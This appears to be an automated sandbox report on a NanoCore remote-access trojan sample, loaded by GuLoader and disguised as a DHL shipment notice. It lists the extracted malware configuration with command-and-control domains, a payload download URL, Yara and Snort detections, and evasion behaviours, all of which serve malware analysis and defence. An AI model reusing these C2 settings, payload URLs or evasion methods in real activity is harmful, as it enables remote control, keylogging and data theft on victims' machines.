Loading ...

Play interactive tourEdit tour

Windows Analysis Report nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Overview

General Information

Sample Name:nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Analysis ID:1361
MD5:cd65994e4f53363527e3651759103759
SHA1:241dda06961d323299c19c1f558168864867169e
SHA256:634115d5eb91226011678443a96617cb0bcc1831621b418a0e16860b79502de7
Infos:

Most interesting Screenshot:

Detection

Nanocore GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe (PID: 6936 cmdline: 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' MD5: CD65994E4F53363527E3651759103759)
    • RegAsm.exe (PID: 9088 cmdline: 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 9096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • Rotacism6.exe (PID: 7172 cmdline: 'C:\Users\user\Driftigt\Rotacism6.exe' MD5: CD65994E4F53363527E3651759103759)
    • RegAsm.exe (PID: 1368 cmdline: 'C:\Users\user\Driftigt\Rotacism6.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
    • RegAsm.exe (PID: 4328 cmdline: 'C:\Users\user\Driftigt\Rotacism6.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 1624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • Rotacism6.exe (PID: 8340 cmdline: 'C:\Users\user\Driftigt\Rotacism6.exe' MD5: CD65994E4F53363527E3651759103759)
    • RegAsm.exe (PID: 6396 cmdline: 'C:\Users\user\Driftigt\Rotacism6.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "005eae7f-e51b-4c9c-bdf2-9db4e686", "Group": "CATA", "Domain1": "septnan.duckdns.org", "Domain2": "asynno.ddns.net", "Port": 55642, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x23cef:$a: NanoCore
    • 0x23d48:$a: NanoCore
    • 0x23d85:$a: NanoCore
    • 0x23dfe:$a: NanoCore
    • 0x23d51:$b: ClientPlugin
    • 0x23d8e:$b: ClientPlugin
    • 0x2468c:$b: ClientPlugin
    • 0x24699:$b: ClientPlugin
    • 0x1b545:$e: KeepAlive
    • 0x241d9:$g: LogClientMessage
    • 0x24159:$i: get_Connected
    • 0x15d21:$j: #=q
    • 0x15d51:$j: #=q
    • 0x15d8d:$j: #=q
    • 0x15db5:$j: #=q
    • 0x15de5:$j: #=q
    • 0x15e15:$j: #=q
    • 0x15e45:$j: #=q
    • 0x15e75:$j: #=q
    • 0x15e91:$j: #=q
    • 0x15ec1:$j: #=q
    00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x493f5:$a: NanoCore
      • 0x4944e:$a: NanoCore
      • 0x4948b:$a: NanoCore
      • 0x49504:$a: NanoCore
      • 0x5cbaf:$a: NanoCore
      • 0x5cbc4:$a: NanoCore
      • 0x5cbf9:$a: NanoCore
      • 0x7567b:$a: NanoCore
      • 0x75690:$a: NanoCore
      • 0x756c5:$a: NanoCore
      • 0x49457:$b: ClientPlugin
      • 0x49494:$b: ClientPlugin
      • 0x49d92:$b: ClientPlugin
      • 0x49d9f:$b: ClientPlugin
      • 0x5c96b:$b: ClientPlugin
      • 0x5c986:$b: ClientPlugin
      • 0x5c9b6:$b: ClientPlugin
      • 0x5cbcd:$b: ClientPlugin
      • 0x5cc02:$b: ClientPlugin
      • 0x75437:$b: ClientPlugin
      • 0x75452:$b: ClientPlugin
      00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        35.2.RegAsm.exe.1ddf3f10.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xe75:$x1: NanoCore.ClientPluginHost
        • 0xe8f:$x2: IClientNetworkHost
        35.2.RegAsm.exe.1ddf3f10.0.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xe75:$x2: NanoCore.ClientPluginHost
        • 0x1261:$s3: PipeExists
        • 0x1136:$s4: PipeCreated
        • 0xeb0:$s5: IClientLoggingHost
        37.2.RegAsm.exe.1de03f10.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xe75:$x1: NanoCore.ClientPluginHost
        • 0xe8f:$x2: IClientNetworkHost
        37.2.RegAsm.exe.1de03f10.0.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xe75:$x2: NanoCore.ClientPluginHost
        • 0x1261:$s3: PipeExists
        • 0x1136:$s4: PipeCreated
        • 0xeb0:$s5: IClientLoggingHost
        35.2.RegAsm.exe.1ee1e44c.3.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xd9ad:$x1: NanoCore.ClientPluginHost
        • 0xd9da:$x2: IClientNetworkHost
        Click to see the 25 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 9088, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 9088, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 9088, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 9088, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "005eae7f-e51b-4c9c-bdf2-9db4e686", "Group": "CATA", "Domain1": "septnan.duckdns.org", "Domain2": "asynno.ddns.net", "Port": 55642, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeVirustotal: Detection: 29%Perma Link
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeReversingLabs: Detection: 13%
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\Driftigt\Rotacism6.exeReversingLabs: Detection: 13%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6396, type: MEMORYSTR
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49719 -> 178.32.63.50:80
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49720 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49721 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49723 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49725 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49732 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49741 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49742 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49743 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49745 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49746 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49747 -> 178.32.63.50:80
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49748 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49749 -> 178.32.63.50:80
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49750 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49751 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49754 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49756 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49757 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49758 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49759 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49761 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49762 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49763 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49764 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49765 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49767 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49768 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49769 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49770 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49771 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49773 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49774 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49775 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49776 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49777 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49779 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49780 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49781 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49782 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49783 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49785 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49786 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49787 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49788 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49789 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49791 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49792 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49793 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49794 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49795 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49797 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49798 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49799 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49800 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49801 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49803 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49804 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49805 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49806 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49807 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49809 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49810 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49811 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49812 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49813 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49815 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49818 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49819 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49820 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49821 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49823 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49824 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49825 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49826 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49827 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49829 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49830 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49831 -> 193.104.197.28:55642
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49832 -> 193.104.197.28:55642
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: septnan.duckdns.org
        Source: Malware configuration extractorURLs: asynno.ddns.net
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: septnan.duckdns.org
        Source: Joe Sandbox ViewASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: global trafficHTTP traffic detected: GET /moss/nancata_RbkGW109.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /moss/nancata_RbkGW109.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /moss/nancata_RbkGW109.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
        Source: global trafficTCP traffic: 192.168.11.20:49720 -> 193.104.197.28:55642
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
        Source: RegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpString found in binary or memory: http://178.32.63.50/boss/nancata_RbkGW109.bin
        Source: RegAsm.exe, 00000025.00000002.1820716154.0000000001124000.00000004.00000020.sdmpString found in binary or memory: http://178.32.63.50/moss/nancata_RbkGW109.bin
        Source: RegAsm.exe, 00000023.00000002.1748382157.0000000000EBF000.00000004.00000020.sdmpString found in binary or memory: http://178.32.63.50/moss/nancata_RbkGW109.bin%
        Source: RegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpString found in binary or memory: http://178.32.63.50/moss/nancata_RbkGW109.binhttp://178.32.63.50/boss/nancata_RbkGW109.binwininet.dl
        Source: RegAsm.exe, 00000013.00000003.1470016480.0000000000CC1000.00000004.00000001.sdmpString found in binary or memory: http://178.32.63.50/moss/nancata_RbkGW109.bino
        Source: unknownDNS traffic detected: queries for: septnan.duckdns.org
        Source: global trafficHTTP traffic detected: GET /moss/nancata_RbkGW109.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
